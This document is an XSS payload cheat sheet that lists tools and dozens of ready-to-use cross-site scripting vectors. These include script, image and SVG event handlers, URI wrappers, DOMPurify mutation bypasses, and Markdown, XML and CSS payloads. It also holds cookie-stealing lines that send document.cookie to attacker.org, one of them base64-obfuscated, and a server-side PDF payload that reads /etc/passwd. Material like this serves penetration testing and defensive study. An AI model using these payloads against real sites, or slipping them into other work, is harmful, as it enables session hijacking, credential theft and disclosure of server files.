💉 XSS Payloads

📚 Resources

Payloads

• Portswigger CSS All payloads - ALL html tags and attr for xss payload
• XSS Advanced Payloads
• Edr4 - XSS-Bypass-Filters
• PayloadsAllTheThings
• Mutated XSS (mXSS)

Tools

• XSStrike
• xsser
• dalfox

Blind

• sleepy-puppy
• bXSS
• ezXSS

🧠 Common Payloads

XSS - DOM Based Payloads

# <script> tag
<script>alert('XSS')</>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>

# <img> tag
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//

# <svg> tag
<svgonload=alert(1)> # with ff char
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)

# other
<div onpointerover="alert(45)">MOVE HERE</div>
<a onmouseover="alert(45)">CLICK HERE</a>

#"><img src=/ onerror=alert(2)>
"><svg/onload=alert(1)>
" onmouseover=alert(1) value=" <!-- <a href="" onmouseover=alert(1) value=""></a> -->

HTML5

<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video src=_ onloadstart="alert(1)">
<details/open/ontoggle="alert`1`">

<body ontouchstart=alert(1)>
<body ontouchend=alert(1)>
<body ontouchmove=alert(1)>

Based on duration

<svg><animate/onbegin=alert(1)>
<svg><animate/dur='1s'onend=alert(1)>
<svg><set/onbegin=alert(1)>
<svg><set/dur='1ms'onend=alert(1)>

XSS - JS Content

-(confirm)(document.domain)//
;alert(1);//

XSS Server Side (Dynamic PDF)

<script>
  var x = new XMLHttpRequest();
  x.onload=function(){document.write(btoa(this.responseText))};
  x.open("GET","file:///etc/passwd");x.send();
</script>

<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>

XSS in Wrappers for URI

Wrapper javascript

javascript:prompt(1)
javascript://%0Aalert(1)
javascript://anything%0D%0A%0D%0Awindow.alert(1)

Wrapper data

data:text/html,<script>alert(0)</script>
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTOyk8L3NjcmlwdD4=">Click me</a>

Wrapper vbscript

only IE

vbscript:msgbox("XSS")

In Eval()

8*8,window.location=`https://attacker.org/?c=${document.cookie}`
1+1 && atob`ZG9jdW1lbnQubG9jYXRpb249Ii8vd2ViaG9vay5zaXRlL1VSTD9jb29raWU9Ii5jb25jYXQoZG9jdW1lbnQuY29va2llKQ==`

Mutated XSS (mXSS)

Work in DomPurify

<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<style><a alt="</style><img src=x onerror=alert(1)>">
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>

XSS in File

XML

<name>
  <value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>

<html>
  <head></head>
  <body>
    <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
  </body>
</html>

Mardown

[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)
[a](JaVaScRiPt:alert(1))
![a](https://www.google.com/image.png"onload="alert(1))
![a]("onerror="alert(1))
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
<javascript:prompt(document.cookie)>

CSS

<style>
div  {
    background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
    background-color: #cccccc;
}
</style>

JSFuck

Bypass with JSFuck